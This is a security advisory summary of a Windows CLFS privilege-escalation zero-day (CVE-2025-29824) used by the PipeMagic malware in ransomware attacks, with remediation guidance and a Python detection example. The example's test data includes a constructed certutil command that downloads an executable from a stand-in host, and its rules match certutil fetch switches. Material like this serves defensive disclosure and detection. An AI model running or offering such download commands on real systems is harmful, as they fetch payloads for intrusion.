Full Report
Microsoft has revealed that a now-patched security flaw impacting the Windows Common Log File System (CLFS) was exploited as a zero-day in ransomware attacks aimed at a small number of targets. "The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in
Analysis Summary
# Vulnerability: Windows CLFS Zero-Day (CVE-2025-29824) Exploited by PipeMagic Trojan for Ransomware Deployment
## CVE Details
- CVE ID: CVE-2025-29824
- CVSS Score: Not explicitly specified, but described as a severe **privilege escalation bug** leading to SYSTEM privileges.
- CWE: Not explicitly specified in detail, but related to memory corruption within a kernel driver.
## Affected Systems
- Products: Microsoft Windows (specific versions not fully itemized, but generally affected versions prior to April 2025 Patch Tuesday).
- Versions: All supported versions are confirmed vulnerable prior to the April 2025 patch. *Note: Windows 11 version 24H2 is explicitly noted as **not affected**, because on that version the relevant System Information Classes in `NtQuerySystemInformation` already require `SeDebugPrivilege`.*
- Configurations: Systems not updated via the April 2025 Patch Tuesday cycle.
## Vulnerability Description
CVE-2025-29824 is a zero-day vulnerability affecting the **Windows Common Log File System (CLFS) kernel driver**. Successful exploitation allows a local attacker to achieve **SYSTEM level privileges** through privilege escalation. The exploit reportedly targets a memory corruption issue within the CLFS driver and utilizes the `RtlSetAllBits` API to overwrite memory contents.
## Exploitation
- Status: **Exploited in the wild** (used in active ransomware attacks attributed to the threat actor tracked as Storm-2460).
- Complexity: Not stated explicitly; the exploit was delivered through the multi-functional PipeMagic malware, which implies it is practical for a capable threat actor rather than opportunistic attackers.
- Attack Vector: Implied **Local** post-initial compromise, as the vulnerability serves as a Privilege Escalation mechanism. Initial access was observed using `certutil` to fetch payloads from compromised third-party sites.
## Impact
- Confidentiality: High (SYSTEM access can lead to full data exfiltration).
- Integrity: High (SYSTEM access allows for modification or destruction of system data).
- Availability: High (Used to deploy ransomware, leading to service disruption).
## Remediation
### Patches
- Microsoft fixed this vulnerability as part of its **April 2025 Patch Tuesday update**. Users must apply the relevant update package for their operating system version.
### Workarounds
- No specific generic workarounds were detailed other than applying the patch.
- **Note on Configuration:** Ensuring non-administrative users do not hold `SeDebugPrivilege` limits access to the System Information Classes within `NtQuerySystemInformation` that the exploit relies on, and may therefore act as a mitigating factor on systems not yet patched. Windows 11 24H2 already enforces this restriction, which is why exploitation attempts fail there.
## Detection
- **Indicators of compromise:** Execution of PipeMagic malware, often launched via a malicious MSBuild file containing an encrypted payload. Observation of suspicious activity stemming from the CLFS driver. Threat activity tracked under **Storm-2460**.
- **Detection methods and tools:** Monitoring for the initial stages of payload delivery, such as unusual network connections initiated by `certutil` downloading executables, and subsequent process execution from MSBuild scripts.
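The two detection methods above, applied to process-creation telemetry, as an added example (not from the report or from Microsoft): it flags `certutil` invocations that fetch a URL and any child process of `MSBuild.exe` outside the expected compiler toolchain. The event records and file names are constructed for illustration.

```python
import re
from pathlib import PureWindowsPath

# Constructed Sysmon-style process-creation events; not telemetry from the incident.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil -urlcache -split -f http://files.example.invalid/upd.exe C:\Users\Public\upd.exe"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"certutil -hashfile C:\Users\alice\setup.msi SHA256"},            # benign local use
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "parent": r"C:\Windows\System32\cmd.exe", "cmdline": r"MSBuild.exe C:\Users\Public\build.csproj"},
    {"image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",             # normal compiler child
     "parent": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"csc.exe /noconfig /out:a.dll a.cs"},
    {"image": r"C:\Users\Public\svc.exe",                                             # unexpected child
     "parent": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "cmdline": r"C:\Users\Public\svc.exe"},
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
FETCH_SWITCHES = ("-urlcache", "-verifyctl")   # certutil switches that retrieve remote content
EXPECTED_MSBUILD_CHILDREN = {"csc.exe", "vbc.exe", "conhost.exe", "msbuild.exe"}

def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def certutil_download(ev: dict) -> bool:
    """certutil invoked with a fetch switch and a URL on the command line."""
    if _name(ev["image"]) != "certutil.exe":
        return False
    cmd = ev["cmdline"].lower()
    return any(s in cmd for s in FETCH_SWITCHES) and URL_RE.search(cmd) is not None

def unexpected_msbuild_child(ev: dict) -> bool:
    """MSBuild spawning something other than the .NET compiler toolchain."""
    return _name(ev["parent"]) == "msbuild.exe" and _name(ev["image"]) not in EXPECTED_MSBUILD_CHILDREN

def scan(events):
    """Return (rule, detail) findings in event order."""
    findings = []
    for ev in events:
        if certutil_download(ev):
            findings.append(("certutil_remote_fetch", ev["cmdline"]))
        if unexpected_msbuild_child(ev):
            findings.append(("msbuild_unexpected_child", ev["image"]))
    return findings

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Tune `EXPECTED_MSBUILD_CHILDREN` to the build tooling actually present in your environment before deploying this as a rule.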
## References
- Vendor Advisory (Microsoft): hxxps://www.microsoft.com/en-us/security/blog/2025/04/08/exploitation-of-clfs-zero-day-leads-to-ransomware-activity/
- Related PipeMagic Analysis (Kaspersky/SecureList, referencing previous CVE): hxxps://securelist.com/nokoyawa-ransomware-attacks-with-windows-zero-day/109483/